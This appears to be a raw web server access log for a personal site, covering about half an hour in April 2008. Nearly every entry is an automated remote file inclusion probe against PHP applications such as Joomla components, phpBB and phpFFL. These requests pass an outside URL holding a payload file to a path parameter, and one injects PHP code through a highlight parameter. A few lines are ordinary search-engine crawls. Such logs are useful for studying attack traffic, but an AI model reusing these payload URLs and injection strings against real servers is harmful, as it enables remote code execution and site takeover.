74.53.73.178 - - [08/Apr/2008:10:37:35 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:10:38:14 -0700] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/belahan.memek/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:10:38:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/belahan.memek/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:10:38:15 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/belahan.memek/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:10:38:30 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/belahan.memek/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.35 - - [08/Apr/2008:10:38:39 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://daryl.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
64.185.237.35 - - [08/Apr/2008:10:38:44 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://daryl.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.84.7.82 - - [08/Apr/2008:10:39:17 -0700] "GET //citywriter/head.php?path=http://h1.ripway.com/h4dy/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:10:42:10 -0700] "GET /logs/access_080216.log//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.52.93 - - [08/Apr/2008:10:43:00 -0700] "GET /bikes/dteel/2008_01_26/ HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:10:43:42 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:10:43:42 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:10:43:43 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:43:43 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:43:43 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:43:44 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:10:43:54 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.143 - - [08/Apr/2008:10:43:56 -0700] "GET /logs/phphtml.php?htmlclass_path=http://funtorace.com/cache/rss11.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.185.237.143 - - [08/Apr/2008:10:43:56 -0700] "GET /phphtml.php?htmlclass_path=http://funtorace.com/cache/rss11.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
217.195.114.88 - - [08/Apr/2008:10:45:06 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.195.114.88 - - [08/Apr/2008:10:45:06 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:10:45:46 -0700] "GET /logs/access.log/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:10:45:51 -0700] "GET /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:10:45:52 -0700] "GET /logs/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:10:46:07 -0700] "GET /logs/access_080324.log//components/com_flyspray/startdown.php?file=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:10:46:07 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.4.234.2 - - [08/Apr/2008:10:46:31 -0700] "GET /index.php?redir=http://it.geocities.com/biglionp0wa/mid.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.63" "www.dmulk.com"
72.26.101.32 - - [08/Apr/2008:10:47:31 -0700] "GET /logs/access_080308.log//codebb/lang_select?phpbb_root_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [08/Apr/2008:10:47:31 -0700] "GET //codebb/lang_select?phpbb_root_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [08/Apr/2008:10:47:31 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [08/Apr/2008:10:47:31 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:10:48:27 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:10:48:27 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:10:48:27 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:10:48:31 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:10:48:32 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:10:48:32 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.200.113.26 - - [08/Apr/2008:10:48:40 -0700] "GET //index.php?option=com_custompages&cpage=http://borovskr.kaluga.ru/components/com_wraper? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:10:48:44 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:10:48:58 -0700] "GET /logs/access_080126.log//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:10:49:04 -0700] "GET //matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:10:49:07 -0700] "GET /logs//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:10:49:26 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.51.155 - - [08/Apr/2008:10:50:52 -0700] "GET /bikes/dteel/?M=A HTTP/1.0" 200 9501 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:10:50:56 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:10:51:01 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.114.88 - - [08/Apr/2008:10:51:24 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.195.114.88 - - [08/Apr/2008:10:51:24 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:10:52:28 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://geocities.com/s.memek/Mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:10:52:29 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://geocities.com/s.memek/Mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.93.240.199 - - [08/Apr/2008:10:53:33 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
81.93.240.199 - - [08/Apr/2008:10:53:33 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:10:53:42 -0700] "GET //modules/xfsection/modify.php?dir_module=http://h1.ripway.com/castel/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:10:53:43 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.141.152 - - [08/Apr/2008:10:53:52 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
88.84.141.152 - - [08/Apr/2008:10:53:53 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:10:54:00 -0700] "GET /logs/access.log/trans.php?trans=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:10:54:01 -0700] "GET /trans.php?trans=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:10:54:01 -0700] "GET /logs/trans.php?trans=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:10:54:38 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:10:54:38 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:10:54:39 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:10:54:47 -0700] "GET /logs/?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 42265 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:10:54:48 -0700] "GET /?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.208.111.178 - - [08/Apr/2008:10:55:25 -0700] "GET /logs/access_080306.log/admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kclarkes/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [08/Apr/2008:10:55:25 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kclarkes/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [08/Apr/2008:10:55:26 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kclarkes/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:10:55:39 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:10:55:40 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:10:55:40 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:10:56:18 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.3.132.165 - - [08/Apr/2008:10:56:24 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.3.132.165 - - [08/Apr/2008:10:56:24 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.17.225 - - [08/Apr/2008:10:56:31 -0700] "GET /bikes/GPS/WeSTOC2008/ HTTP/1.0" 200 842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.145.0.44 - - [08/Apr/2008:10:57:12 -0700] "GET /logs/access_071216.log/comments-display-tpl.php?language_file=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [08/Apr/2008:10:57:13 -0700] "GET /comments-display-tpl.php?language_file=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [08/Apr/2008:10:57:13 -0700] "GET /logs/comments-display-tpl.php?language_file=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:10:57:18 -0700] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:10:57:18 -0700] "GET /logs/access_080111.log HTTP/1.0" 200 683006 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:10:57:19 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.145.0.44 - - [08/Apr/2008:10:57:23 -0700] "GET /logs/access_071217.log/comments-display-tpl.php?language_file=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:10:57:32 -0700] "GET /logs/access_080224.log HTTP/1.0" 200 1720515 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:10:57:37 -0700] "GET /?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:10:57:40 -0700] "GET /logs/?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 42265 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:10:58:19 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:10:58:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:10:58:20 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:10:59:08 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:59:29 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.208.111.178 - - [08/Apr/2008:10:59:30 -0700] "GET /logs/access_080313.log/admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kclarkes/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:59:47 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:11:00:00 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:11:00:02 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 200 4139 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:11:01:13 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [08/Apr/2008:11:01:22 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
69.94.72.29 - - [08/Apr/2008:11:01:22 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
80.93.62.97 - - [08/Apr/2008:11:01:25 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/reyen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [08/Apr/2008:11:01:27 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/reyen/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [08/Apr/2008:11:01:28 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/reyen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [08/Apr/2008:11:01:34 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/reyen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:04:30 -0700] "GET /logs/?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 42265 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
